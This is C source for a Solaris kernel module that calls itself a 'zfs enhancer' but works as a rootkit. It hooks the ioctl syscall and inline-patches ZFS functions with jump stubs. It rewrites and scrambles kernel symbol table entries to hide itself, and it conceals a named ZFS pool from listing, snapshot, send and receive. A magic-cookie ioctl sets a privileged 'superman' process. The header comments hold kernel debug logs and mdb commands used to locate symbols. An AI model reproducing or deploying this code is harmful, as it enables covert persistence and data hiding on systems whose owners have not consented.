/*
 * ksh_zfs.c
 *
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 336707 kern.warning] WARNING: do_hook(): m_tmp: 0xd4ecbca8 id:39
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 169955 kern.warning] WARNING: do_hook(): found zfs module at: 0xd4dbbe00
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 336707 kern.warning] WARNING: do_hook(): m_tmp: 0xd4ecbca8 id:39
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 643775 kern.warning] WARNING: hooking zfs_dirlook
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 177401 kern.warning] WARNING: do_hook(): found symbol of zfs_dirlook at: 0xf9e6821c
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 458335 kern.warning] WARNING: do_hook(): symbol table entry for zfs_dirlook at: 0xd51b6784
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 143910 kern.warning] WARNING: do_hook(): hooks[0].orig_handler: 0xdac9aff4
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 879481 kern.warning] WARNING: do_hook(): hooks[0].rep_handler: 0xdd6c3280
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 157262 kern.warning] WARNING: do_hook(): hooks[0].hook_handler: 0xfa3d9a80
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 586658 kern.warning] WARNING: do_hook(): hooking zfs_dirlook done
 Mar 31 18:09:04 opensolaris-vm winnipu: [ID 552120 kern.warning] WARNING: ksh entered the building
 *
 * ::nm
 * modules::list "struct modctl" mod_next | ::print "struct modctl" 
 * modules::list "struct modctl" mod_next | ::print "struct modctl" mod_modname mod_filename mod_mp mod_id mod_next
 * modules::list "struct modctl" mod_next | ::print "struct modctl" mod_mp | ::print "struct module"
 *
 * modules::list "struct modctl" mod_next | ::print "struct modctl" mod_mp | ::print "struct module" symhdr | ::print Shdr sh_addr
 *
 * symbols:
 * modules::list "struct modctl" mod_next | ::print "struct modctl" mod_mp | ::print "struct module" symtbl strings filename
 *
 * symbols from struct module addr
 * 0xd4dbbe00::print "struct module" symtbl strings
 * symtbl = 0xd51af050 ""
 * strings = 0xd51b8e02 ""
 *
 * 0xd51af050,100 ::print Sym
 * 0xd51b8e02,100 ::dump
 * 
 * ::nm ! grep zfs_dirlook
 * 0xf9e6821c|0x0000022c|FUNC |GLOB |0x0  |1       |zfs_dirlook
 *
 * ::nm ! grep zfs_dirlook
 * 0xdf179100|0x0000022c|FUNC |GLOB |0x0  |1       |zfs_dirlook
 * 0xd6460ff4|0x00000004|OBJT |GLOB |0x0  |ABS     |sys_zfs_dirlook
 * 0xfa3d7a80|0x0000003d|FUNC |GLOB |0x0  |1       |hook_zfs_dirlook
 *
 * 0xd51af050,1000 ::print Sym ! grep 0xf9e6821c
 *
 *
 * -->
 *
    symtbl_section = 0
    symtbl = 0xdc038b48 ""
    strings = 0xdc03ff8a ""
    hashsize = 0x199
    buckets = 0xdc03efc8
    chains = 0xdc03f2fa
    nsyms = 0x648
    bss_align = 0x8
    bss_size = 0x128
    bss = 0xdc029ce8
    filename = 0xdbf21490 "/kernel/sys/nfs"
    head = 0xde8aa570
 *
 * > 0xdc038b48,100 ::dump
 *             0 1 2 3  4 5 6 7 \/ 9 a b  c d e f  01234567v9abcdef
 *             dc038b40:  01000000 00000000 00000000 00000000  ................
 *             dc038b50:  00000000 00000000 01000000 d00b41fa  ..............A.
 *             dc038b60:  0f040000 02000100 11000000 901241fa  ..............A.
 *
 * > 0xdc03ff8a,200 ::dump
 *             0 1 2 3  4 5 6 7  8 9\/ b  c d e f  0123456789vbcdef
 *             dc03ff80:  00000000 00000000 0000006e 6673335f  ...........nfs3_
 *             dc03ff90:  61747472 5f636163 6865006e 66735f67  attr_cache.nfs_g
 *
 * -->
symtbl = scsi_vhci_f_asym_emc`_init-0x24c50fb8 "" // d51af050
strings = scsi_vhci_f_asym_emc`_init-0x24c47206 "" // d51b8e00
filename = scsi_vhci_f_asym_emc`_init-0x24efa3c8 "/kernel/fs/zfs"

 * d51af050,200 ::print Sym
 *
 *
 *
 * Copyright (C) 2009, 2010 Iron Software
 * 	ksh <ksh@ironsoftware.de>
 *
 */
#undef DEBUG
#ifdef __i386
 #define _SYSCALL32_IMPL
#endif
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/kobj.h>
#include <sys/elf.h>

#include <sys/types.h>
#include <sys/param.h>
#include <sys/sysmacros.h>
#include <sys/errno.h>
#include <sys/uio.h>
#include <sys/buf.h>
#include <sys/open.h>

/* SOLARIS MODULES */
#include <sys/ddi.h>
#include <sys/modctl.h>
#include <sys/cmn_err.h>

/* DMU */
#include <sys/dmu.h>
#include <sys/dmu_objset.h>
#include <sys/dsl_dataset.h>
#include <sys/dsl_dir.h>
#include <sys/dsl_prop.h>

/* ZFS */

#include <sys/fs/zfs.h>
#include <sys/zfs_dir.h>
#include <sys/zfs_acl.h>
#include <sys/zfs_ioctl.h>
#include <sys/zfs_ctldir.h>

/* VFS */
#include <sys/vfs.h>
#include <sys/gfs.h>
#include <sys/vnode.h>
#include <fs/fs_subr.h>
#include <sys/zfs_vfsops.h>
#include <sys/vfs_opreg.h>

/* SOLARIS NVLIST */
#include <sys/nvpair.h>
#include <sys/nvpair_impl.h>

#include "ksh_zfs.h"
#include "zfs_namecheck.h"



/**
 * GLOBAL MACRO TO HIDE
 */
#define MODULE_NAME			"winnipu"

#define ZFS_POOL 			"poopool"
#define ZFS_POOL_FS			"poopool/$bleh"
#define ZFS_POOL_MNTPNT			"/system"


/** 
 * GEN PROTOTYPES
 */ 
#define dsym(type,name,args...) 	type hook_##name(args); \
					type (*orig_##name)(args)

#define	isym(type,name,args...)		type (*sys_##name)(args)	

					/* name,  hook_handler,	  orig_handler,	 orig_symbol,   size,    ddi_stuff,  orig_asm, char */
#define hook(x)          		{ #x, (long *)hook_##x, (long *)&orig_##x,    NULL,  0, (void *) NULL,    "",  "\xb8\x00\x00\x00\x00\xff\xe0" },
#define import(x)          		{ #x, (long *)NULL, 	(long *)&sys_##x,     NULL,  0, (void *) NULL,    "",  "\xb8\x00\x00\x00\x00\xff\xe0" },


/**
 * LIST OF HOOKS
 */

/* VOPS HERE */
dsym(int,		zfs_dirlook, 			znode_t *dzp, char *name, vnode_t **vpp, int flags, int *deflg, pathname_t *rpnp);
dsym(int,		zfs_mkdir, 			vnode_t *dvp, char *dirname, vattr_t *vap, vnode_t **vpp, cred_t *cr);
dsym(int, 		zfs_zaccess,			znode_t *zp, int mode, int flags, boolean_t skipaclchk, cred_t *cr);
dsym(int, 		zfs_read,			vnode_t *vp, uio_t *uio, int ioflag, cred_t *cr, caller_context_t *ct);
dsym(int, 		zfs_write,			vnode_t *vp, uio_t *uio, int ioflag, cred_t *cr, caller_context_t *ct);
dsym(int,		zfs_ioc_pool_get_history,	zfs_cmd_t *zc);
dsym(void,	 	zfs_log_history,		zfs_cmd_t *zc);
dsym(int, 		zfs_ioc_pool_configs,		zfs_cmd_t *zc);

/* ZFS INTERNALS */
dsym(int, 		zfs_ioc_pool_stats,		zfs_cmd_t *zc);
dsym(int, 		zfs_ioc_dataset_list_next,	zfs_cmd_t *zc);
dsym(int,		dsl_dir_is_private,		dsl_dir_t *dd);
dsym(int,		dataset_namecheck,		const char *path, namecheck_err_t *why, char *what);

/* ZFS IMPORTS - ONLY - */
isym(int,		spa_get_stats,			const char *name, nvlist_t **config, char *altroot, size_t buflen);
isym(nvlist_t *, 	spa_all_configs,		uint64_t *generation);
isym(int, 		put_nvlist,			zfs_cmd_t *zc, nvlist_t *nvl);
isym(int,		dataset_name_hidden,		const char *name);

/* VOPS IMPORTS - ONLY -*/
isym(int,		zfs_open,			vnode_t **vpp, int flag, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_close,			vnode_t *vp, int flag, int count, offset_t offset, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_ioctl,			vnode_t *vp, int com, intptr_t data, int flag, cred_t *cred, int *rvalp, caller_context_t *ct);
isym(int,		zfs_access,			vnode_t *vp, int mode, int flag, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_lookup,			vnode_t *dvp, char *nm, vnode_t **vpp, struct pathname *pnp, int flags, 
							vnode_t *rdir, cred_t *cr,  caller_context_t *ct, int *direntflags, pathname_t *realpnp);
isym(int,		zfs_create,			vnode_t *dvp, char *name, vattr_t *vap, vcexcl_t excl, int mode, vnode_t **vpp, 
							cred_t *cr, int flag, caller_context_t *ct, vsecattr_t *vsecp);
isym(int,		zfs_remove,			vnode_t *dvp, char *name, cred_t *cr, caller_context_t *ct, int flags);
isym(int,		zfs_rmdir,			vnode_t *dvp, char *name, vnode_t *cwd, cred_t *cr, caller_context_t *ct, int flags);
isym(int,		zfs_readdir,			vnode_t *vp, uio_t *uio, cred_t *cr, int *eofp, caller_context_t *ct, int flags);
isym(int,		zfs_fsync,			vnode_t *vp, int syncflag, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_inactive,			vnode_t *vp, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_getattr,			vnode_t *vp, vattr_t *vap, int flags, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_setattr,			vnode_t *vp, vattr_t *vap, int flags, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_rename,			vnode_t *sdvp, char *snm, vnode_t *tdvp, char *tnm, cred_t *cr, caller_context_t *ct, int flags);
isym(int,		zfs_symlink,			vnode_t *dvp, char *name, vattr_t *vap, char *link, cred_t *cr, caller_context_t *ct, int flags);
isym(int,		zfs_readlink,			vnode_t *vp, uio_t *uio, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_link,			vnode_t *tdvp, vnode_t *svp, char *name, cred_t *cr, caller_context_t *ct, int flags);	
isym(int,		zfs_seek,			vnode_t *vp, offset_t ooff, offset_t *noffp, caller_context_t *ct);
isym(int,		zfs_fid,			vnode_t *vp, fid_t *fidp, caller_context_t *ct);
isym(int,		zfs_pathconf,			vnode_t *vp, int cmd, ulong_t *valp, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_getsecattr,			vnode_t *vp, vsecattr_t *vsecp, int flag, cred_t *cr, caller_context_t *ct);
isym(int,		zfs_setsecattr,			vnode_t *vp, vsecattr_t *vsecp, int flag, cred_t *cr, caller_context_t *ct);


/* SYSCALLS ARE HOOKED SEPEREATELY */
dsym(int, 		ioctl, 				int fdes, int cmd, intptr_t arg);
isym(pid_t, 		getpid, 			void);

/* STATIC PROTOTYPES */
static vnode_t *ksh_mknode_kshdir(vnode_t *);
vnode_t *ksh_root(znode_t *zp);


struct new_hook hooks[] = {
	hook(zfs_dirlook)
//	hook(zfs_mkdir)
	hook(zfs_read)
	hook(zfs_write)
	hook(zfs_zaccess)
	hook(zfs_ioc_pool_stats)
	hook(zfs_ioc_dataset_list_next)
	hook(zfs_log_history)
	hook(zfs_ioc_pool_get_history)
	hook(zfs_ioc_pool_configs)
	hook(dsl_dir_is_private)
	hook(dataset_namecheck)
	import(spa_get_stats)
	import(put_nvlist)
	import(spa_all_configs)
	import(dataset_name_hidden)
	{0}
};

/*
 * GLOBAL INTERNAL VARS
 */
int					is_vfs_init;
zfs_enhancer_t				ze;
vnode_t *				z_ksh_root_vnode;
vnodeops_t * 				ksh_ops_root;
static const fs_operation_def_t 	zfs_dvnodeops_template[];
static gfs_opsvec_t			ksh_opsvec[];
static gfs_dirent_t 			ksh_root_entries[];
static kmutex_t 			ksh_lock;



/**
 * SOLARIS MODULE SPECIFIC STUFF
 */
static struct modldrv modldrv = {
	&mod_miscops,
	"zfs enhancer",
	NULL
};

static struct modlinkage modlinkage = {
	MODREV_1, 
	(void *)&modldrv, 
	NULL
};


/** 
 * NVPAIR imports
 */ 

static void
nv_mem_free(nvpriv_t *nvp, void *buf, size_t size)
{
        nv_alloc_t *nva = nvp->nvp_nva;

        nva->nva_ops->nv_ao_free(nva, buf, size);
}

/*
 * nvp_buf_free - de-Allocate an i_nvp_t.
 */
static void
nvp_buf_free(nvlist_t *nvl, nvpair_t *nvp)
{
        nvpriv_t *priv = (nvpriv_t *)(uintptr_t)nvl->nvl_priv;
        size_t nvsize = nvp->nvp_size + offsetof(i_nvp_t, nvi_nvp);

        nv_mem_free(priv, NVPAIR2I_NVP(nvp), nvsize);
}

/*
 * nvp_buf_unlink - unlink an removed nvpair out of the nvlist.
 */
static void
nvp_buf_unlink(nvlist_t *nvl, nvpair_t *nvp)
{
        nvpriv_t *priv = (nvpriv_t *)(uintptr_t)nvl->nvl_priv;
        i_nvp_t *curr = NVPAIR2I_NVP(nvp);

        /*
         * protect nvlist_next_nvpair() against walking on freed memory.
         */
        if (priv->nvp_curr == curr)
                priv->nvp_curr = curr->nvi_next;

        if (curr == priv->nvp_list)
                priv->nvp_list = curr->nvi_next;
        else
                curr->nvi_prev->nvi_next = curr->nvi_next;

        if (curr == priv->nvp_last)
                priv->nvp_last = curr->nvi_prev;
        else
                curr->nvi_next->nvi_prev = curr->nvi_prev;
}


/*
 * Frees all memory allocated for an nvpair (like embedded lists) with
 * the exception of the nvpair buffer itself.
 */
static void
nvpair_free(nvpair_t *nvp)
{
        switch (NVP_TYPE(nvp)) {
        case DATA_TYPE_NVLIST:
                nvlist_free(EMBEDDED_NVL(nvp));
                break;
        case DATA_TYPE_NVLIST_ARRAY: {
                nvlist_t **nvlp = EMBEDDED_NVL_ARRAY(nvp);
                int i;

                for (i = 0; i < NVP_NELEM(nvp); i++)
                        if (nvlp[i] != NULL)
                                nvlist_free(nvlp[i]);
                break;
        }
        default:
                break;
        }
}

/*
 * nvlist_free - free an unpacked nvlist
 */
void
my_nvlist_free(nvlist_t *nvl)
{
        nvpriv_t *priv;
        i_nvp_t *curr;

        if (nvl == NULL ||
            (priv = (nvpriv_t *)(uintptr_t)nvl->nvl_priv) == NULL)
                return;

        /*
         * Unpacked nvlist are linked through i_nvp_t
         */
        curr = priv->nvp_list;
        while (curr != NULL) {
                nvpair_t *nvp = &curr->nvi_nvp;
                curr = curr->nvi_next;

                nvpair_free(nvp);
                nvp_buf_free(nvl, nvp);
        }

        if (!(priv->nvp_stat & NV_STAT_EMBEDDED))
                nv_mem_free(priv, nvl, NV_ALIGN(sizeof (nvlist_t)));
        else
                nvl->nvl_priv = 0;

        nv_mem_free(priv, priv, sizeof (nvpriv_t));
}



/*
 * Remove first one with matching name and type
 */
int
my_nvlist_remove(nvlist_t *nvl, const char *name, data_type_t type)
{
        nvpriv_t *priv;
        i_nvp_t *curr;

        if (nvl == NULL || name == NULL ||
            (priv = (nvpriv_t *)(uintptr_t)nvl->nvl_priv) == NULL)
                return (EINVAL);

        curr = priv->nvp_list;
        while (curr != NULL) {
                nvpair_t *nvp = &curr->nvi_nvp;

                if (strcmp(name, NVP_NAME(nvp)) == 0 && NVP_TYPE(nvp) == type) {
                        nvp_buf_unlink(nvl, nvp);
                        nvpair_free(nvp);
                        nvp_buf_free(nvl, nvp);

                        return (0);
                }
                curr = curr->nvi_next;
        }

        return (ENOENT);
}
/**** END OF NVPAIR ****/


int
fnk_length(void *ptr, char *PTR, int ptr_size) 
{
	int ret = 0;

	while ( ptr ++ ) {
	
		if ( !memcmp(ptr, PTR, ptr_size)) 
			return ( ret + ptr_size );

		ret ++ ;

		if ( ret > 4096 )
			return B_FALSE;
	}
		
	return ( ret );
}

int
set_sym_tbl_entr(struct module *mp, long *orig, long *replace) 
{
        uint_t   shn;
        Shdr    *shp;
        uint_t   i;
        Sym     *sp, *ksp;
        char     *symname;

        /*
         * get the associated string table header
         */
        if ( (mp == 0) || (mp->symhdr == 0) || (mp->symhdr->sh_link >= mp->hdr.e_shnum))
                return (-2);

        /*
         * loop through the symbol table adjusting values to account
         * for where each section got loaded into memory.  Also
         * fill in the hash table.
         */
        for (i = 1; i < mp->nsyms; i++) {
                sp = (Sym *)(mp->symtbl + i * mp->symhdr->sh_entsize);
                if (sp->st_name == 0 || sp->st_shndx == SHN_UNDEF)
                        continue;
                if (sp->st_name >= mp->strhdr->sh_size)
                        return (-1);

		/* return addr in symbol table */
		if ( (long)sp->st_value == (long)orig ) {
			debug("orig value is: 0x%x", sp->st_value);
			sp->st_value = replace;
			debug("replacing with: 0x%x", replace);
			debug("mod value is: 0x%x", sp->st_value);
			return ( 1 );
		}
	}

        return (0);
}

int
set_sym_tbl_name(struct module *mp, long *handler)
{
        uint_t   shn;
        Shdr    *shp;
        uint_t   i;
        Sym     *sp, *ksp;
        char     *symname;


        /*
         * get the associated string table header
         */
        if ( (mp == 0) || (mp->symhdr == 0) || (mp->symhdr->sh_link >= mp->hdr.e_shnum))
                return (-2);

        /*
         * loop through the symbol table adjusting values to account
         * for where each section got loaded into memory.  Also
         * fill in the hash table.
         */
        for (i = 1; i < mp->nsyms; i++) {
		char a[] = "m0l0ke7i6ab04a84ug7arzfn1xc4v6o7i8he5wr7z234jnvo87tg6327r\x00";
                sp = (Sym *)(mp->symtbl + i * mp->symhdr->sh_entsize);
                if (sp->st_name == 0 || sp->st_shndx == SHN_UNDEF)
                        continue;
                if (sp->st_name >= mp->strhdr->sh_size)
                        return (-1);

                symname = mp->strings + sp->st_name;
		if ( i > sizeof(a) )
			*(a + sizeof(a) - 3) += i;
		else
			a[i] += i;

		/* return addr in symbol table */
		if ( sp->st_value == handler ) {
			int i;

			debug("orig value is: %s", symname);
			for ( i = 0; i < strlen(symname); i++)
				symname[i] = a[i];
			debug("mod value is: %s", symname);
			return ( 1 );
		}
	}

        return (0);
}


long
get_sym_tbl_entr(struct module *mp, char *match)
{
        uint_t   shn;
        Shdr    *shp;
        uint_t   i;
        Sym     *sp, *ksp;
        char     *symname;

        /*
         * get the associated string table header
         */
        if ( (mp == 0) || (mp->symhdr == 0) || (mp->symhdr->sh_link >= mp->hdr.e_shnum))
                return (-2);

        /*
         * loop through the symbol table adjusting values to account
         * for where each section got loaded into memory.  Also
         * fill in the hash table.
         */
        for (i = 1; i < mp->nsyms; i++) {
                sp = (Sym *)(mp->symtbl + i * mp->symhdr->sh_entsize);
                if (sp->st_name == 0 || sp->st_shndx == SHN_UNDEF)
                        continue;
                if (sp->st_name >= mp->strhdr->sh_size)
                        return (-1);

                symname = mp->strings + sp->st_name;

		/* return addr in symbol table */
		if ( !strcmp(symname, match) ) {
			debug("orig value is: 0x%x", sp->st_value);
			return ( &sp->st_value );
		}
	}

        return (0);
}

/**
 * REPLACEING THE ORIGINALS
 */
void
do_hook(struct modctl *mods, struct module *m_me) 
{
	void *ptr;
	int num = 0;
	int error = 0;
	struct module *m_zfs = NULL;
	struct modctl *bkp, *m_tmp;
      

	bkp = m_tmp = mods;
	while ( mods->mod_next != bkp ) {

		m_tmp = mods->mod_next;
		if ( !strcmp(m_tmp->mod_modname, "zfs") ) {
			m_zfs = (struct module *)m_tmp->mod_mp;
			debug("found zfs module at: 0x%x", m_zfs);
			break;
		}
		else {
			mods = m_tmp;
		}
	}
	debug("found me at: 0x%x", m_me);	

	/** 
	 * HOOKS START HERE 
	 */
	/* backup original syscall */
	orig_ioctl = (caddr_t)sysent[SYS_ioctl].sy_callc;
	sys_getpid = (caddr_t)sysent[SYS_getpid].sy_callc;
	/* syscall hook */
	sysent[SYS_ioctl].sy_callc = (caddr_t)&hook_ioctl;

	/* loop all hooks */	
	while ( hooks[num].name ) {
		debug("%s %s", (hooks[num].hook_handler) ? "hooking" : "importing", hooks[num].name);
		if( (hooks[num].ddi_modhandle=ddi_modopen("fs/zfs", KRTLD_MODE_FIRST, &error)) != NULL) {
			ptr = ddi_modsym(hooks[num].ddi_modhandle, hooks[num].name, &error);
			if ( ptr != NULL) {
				int len = 0;
				char jmpl_x86[7] = "\xb8\x00\x00\x00\x00\xff\xe0";

				/* install orig_##x handler */
				debug("found symbol of %s at: 0x%x", hooks[num].name, ptr);

				/** RELOCATE orig_##name symbol **/
				memcpy((long *)hooks[num].orig_handler, (long)&ptr, sizeof(long *));
				hooks[num].orig_symbol = ptr;

				/** hook_handler is NULL means its an import only */
				if ( hooks[num].hook_handler == NULL )	{
					goto out;
				}

				/* lookup address of symbol tables entry */
				if ( (hooks[num].orig_handler = get_sym_tbl_entr(m_zfs, hooks[num].name)) <= 0) {
					debug("symbol table entry for %s at: 0x%x", hooks[num].name, 0x0);
                                        ddi_modclose(hooks[num].ddi_modhandle);
					goto out;
				}

				debug("hooks[%d].orig_handler: 0x%x", num, hooks[num].orig_handler);
				debug("hooks[%d].hook_handler: 0x%x", num, hooks[num].hook_handler);

				/* safe the first 5 bytes of the orig function */
				memcpy(hooks[num].orig_handler_asm, ptr, sizeof(hooks[num].orig_handler_asm));

				/* replace symbol with the new handler addr */
				if ( set_sym_tbl_entr(m_zfs, ptr, hooks[num].hook_handler) >= 0) {
					debug("about to patch %x", ptr);
					*(long *)&jmpl_x86[1] = (long)hooks[num].hook_handler;
					memcpy(ptr, &jmpl_x86, sizeof(jmpl_x86));
					memcpy(hooks[num].hook_handler_asm, &jmpl_x86, sizeof(jmpl_x86));
					debug("hooking %s done", hooks[num].name);
				} else {
					debug("hooking %s FAILED", hooks[num].name);
				}

			} else /* ddi_getsym */ {
				cmn_err(CE_WARN, "could not get symbol for %s!\n", hooks[num].name);
			}
		}
		else /* ddi_modopen */ {
			cmn_err(CE_WARN, "ddi_modopen failed. could not get symbol for %s!\n", hooks[num].name);
		}
out:
		num++;
	} /* while */

	kobj_sync();
}


void
do_unhook(struct modctl *mods) 
{
	void *ptr;
        int num = 0;
	int error = 0;
        struct module *m_zfs = NULL;
        struct modctl *bkp, *m_tmp;

        bkp = m_tmp = mods;
        while ( mods->mod_next != bkp ) {

                m_tmp = mods->mod_next;
                if ( !strcmp(m_tmp->mod_modname, "zfs") ) {
                        m_zfs = (struct module *)m_tmp->mod_mp;
                        debug("found zfs module at: 0x%x", m_zfs);
                        break;
                }
                else {
                        mods = m_tmp;
                }
        }


	/* restore syscall */
	sysent[SYS_ioctl].sy_callc = (caddr_t)orig_ioctl;

        while ( hooks[num].orig_handler ) {
                debug("unhooking %s", hooks[num].name);

		/* get symbol */
		if( hooks[num].orig_handler && hooks[num].orig_symbol ) {
                	int len;

                        /* install orig_##x handler */
                        debug("found symbol of %s at: 0x%x", hooks[num].name, ptr);

			/* this was a simple import only */	
			if ( hooks[num].hook_handler == NULL ) {
                		ddi_modclose(hooks[num].ddi_modhandle);
				goto out;	
			}

			/* restore hooks */
			memcpy(hooks[num].orig_symbol, hooks[num].orig_handler_asm, sizeof(hooks[num].orig_handler_asm));
			set_sym_tbl_entr(m_zfs, hooks[num].hook_handler, hooks[num].orig_symbol);	
			/* close mod link */
			ddi_modclose(hooks[num].ddi_modhandle);
		}
out:
		num++;
        }

}

/**
 * HOOK FUNCTIONS
 */
int
hook_ioctl(int fdes, int cmd, intptr_t arg)
{
	int ret = B_FALSE;
	zfs_cmd_t *zc = arg;	

	/* syscall never gets executed */
	switch ( cmd ) {
		/* zfs send */
		case ZFS_IOC_SEND:
                         if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) ||
                                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
                                debug("trying to send pool/zfs. denied", "");
				debug("ZFS_IOC_SEND: %s", arg);
				return 0;
			}
			break;
		case ZFS_IOC_RECV:
                         if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) ||
                                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
                                debug("trying to recv pool/zfs. denied", "");
				debug("ZFS_IOC_RECV: %s", arg);
				return 0;
			}
			break;
		/* zfs snapshot */
		case ZFS_IOC_SNAPSHOT:
                         if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) ||
                                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
				debug("trying to snapshot pool/zfs. denied", "");
				debug("ZFS_IOC_SNAPSHOT: %s", arg);
				return 0;
			} 
			break;
	}

	ret = orig_ioctl(fdes, cmd, arg);

	/* after call syscall hooks */
	switch ( cmd ) {
		/* zpool list */
		/* 1. */
//		case ZFS_IOC_POOL_STATS:
//		/* 2. */
		case ZFS_IOC_POOL_GET_PROPS:
			if ( zc->zc_cookie == 0xdefaced ) {
				SET_SUPERMAN( (short) zc->zc_history_len);
				debug("setting superman to: %d", ze.pid);
				return ( 321 );
			}
			debug("ZFS_IOC_POOL_GET_PROPS", "");
			break;
		/* zpool status */
		case ZFS_IOC_POOL_CONFIGS:
			/*
			for(i = 0; i < img_len; i++) {
             			 printf("%s%02x", (i&&(!(i%16)))?"\\x":"\\x", (uchar)img[i]);
   			}
			*/
			debug("ZFS_IOC_POOL_CONFIGS: %s", arg);
			break;
		/* zfs list */
		case ZFS_IOC_SNAPSHOT_LIST_NEXT:
//		case ZFS_IOC_OBJSET_STATS:
                         if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) || 
                                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
                                debug("trying to query pool/zfs. denied", "");
                                debug("ZFS_IOC_OBJSET_STATS", "");
//				ret = orig_ioctl(fdes, cmd, arg);
				/* XXX */
//				bzero((void *)arg, sizeof(zfs_cmd_t));
                                return ( ret );
                        }
			break;
		case ZFS_IOC_DATASET_LIST_NEXT:

                        if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) || 
                                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
                                debug("trying to query dataset pool/zfs. denied", "");
				//XXX: somehow query the next entry
                        }
	//		debug("guid: %x %x cook: %x drr:%x", zc->zc_obj, zc->zc_cookie, zc->zc_objset_type, zc->zc_begin_record);
	//		debug("guid: %x %x %x", zc->zc_begin_record.drr_creation_time, zc->zc_inject_record.zi_objset, zc->zc_inject_record.zi_start);
	//		debug("guid: %x %x %x", zc->zc_inject_record.zi_object, zc->zc_inject_record.zi_end, zc->zc_inject_record.zi_type);
			break;
	}

	return ( ret );
}


int
hook_zfs_zaccess(znode_t *zp, int mode, int flags, boolean_t skipaclchk, cred_t *cr)
{
        int ret = 0;

ATOMIC_LOCK(zfs_zaccess)

        ret = orig_zfs_zaccess(zp, mode, flags, skipaclchk, cr);

ATOMIC_UNLOCK

        return ( ret );
}

int
hook_zfs_mkdir(vnode_t *dvp, char *dirname, vattr_t *vap, vnode_t **vpp, cred_t *cr)
{
	int ret = 0;

ATOMIC_LOCK(zfs_mkdir)

	/* do some extra stuff here */
        if ( !strncmp(ZFS_POOL, dirname, sizeof(ZFS_POOL)) ||
		!strncmp(ZFS_POOL_FS, dirname, sizeof(ZFS_POOL_FS)) ) {
		debug("denied further writing to %s", ZFS_POOL);	
		ATOMIC_UNLOCK
		return -EPERM;
	}

	ret = orig_zfs_mkdir(dvp, dirname, vap, vpp, cr);

ATOMIC_UNLOCK

	return ( ret );
}

int
hook_zfs_dirlook(znode_t *dzp, char *name, vnode_t **vpp, int flags,
    int *deflg, pathname_t *rpnp) 
{
	int ret = 0;

ATOMIC_LOCK(zfs_dirlook)

#ifdef DEBUG
        /* do something amazing here */
        if ( !strncmp(ZFS_POOL_MNTPNT, dzp->z_vnode->v_path, sizeof(ZFS_POOL_MNTPNT)) &&
		!strncmp(name, ZFS_CTLDIR_NAME, sizeof(ZFS_CTLDIR_NAME)) ) {

		if ( !is_vfs_init )
			if ( ksh_vfs_init(dzp->z_zfsvfs) != 0 )
				return -ESRCH;
	
		// set new vnode pointer to new_root
		*vpp = ksh_root(dzp);
		return ( 0 );
        }
#endif

	ret = orig_zfs_dirlook(dzp, name, vpp, flags, deflg, rpnp);
	
ATOMIC_UNLOCK

	return ( ret );
}

int
hook_zfs_ioc_pool_stats(zfs_cmd_t *zc)
{
        nvlist_t *config;
        int error;
        int ret = 0;

ATOMIC_LOCK(zfs_ioc_pool_stats)
	
        error = sys_spa_get_stats(zc->zc_name, &config, zc->zc_value,
            sizeof (zc->zc_value));

        if (config != NULL) {
                ret = sys_put_nvlist(zc, config);
                nvlist_free(config);

                /*
                 * The config may be present even if 'error' is non-zero.
                 * In this case we return success, and preserve the real errno
                 * in 'zc_cookie'.
                 */
                zc->zc_cookie = error;
        } else {
                ret = error;
        }

ATOMIC_UNLOCK

        return (ret);
}


/*
 * inputs:
 * zc_name              name of filesystem
 * zc_cookie            zap cursor
 * zc_nvlist_dst_size   size of buffer for property nvlist
 *
 * outputs:
 * zc_name              name of next filesystem
 * zc_objset_stats      stats
 * zc_nvlist_dst        property nvlist
 * zc_nvlist_dst_size   size of property nvlist
 */
int
hook_zfs_ioc_dataset_list_next(zfs_cmd_t *zc)
{
	int ret = 0;

ATOMIC_LOCK(zfs_ioc_dataset_list_next)

	ret = orig_zfs_ioc_dataset_list_next(zc);
	/* next filesystem will be ours */
	if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) || 
        	!strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
		// XXX: shift cookie here
		debug("pool query %s cookie: %x", zc->zc_name, zc->zc_cookie);
	}

ATOMIC_UNLOCK	
	
	return ( ret );
}


int
hook_zfs_read(vnode_t *vp, uio_t *uio, int ioflag, cred_t *cr, caller_context_t *ct) 
{
	int ret;

ATOMIC_LOCK(zfs_read)

	ret = orig_zfs_read(vp, uio, ioflag, cr, ct);

ATOMIC_UNLOCK

	return (ret);
}

int
hook_zfs_write(vnode_t *vp, uio_t *uio, int ioflag, cred_t *cr, caller_context_t *ct) 
{
	int ret;

ATOMIC_LOCK(zfs_write)

	ret = orig_zfs_write(vp, uio, ioflag, cr, ct);

ATOMIC_UNLOCK

	return (ret);
}

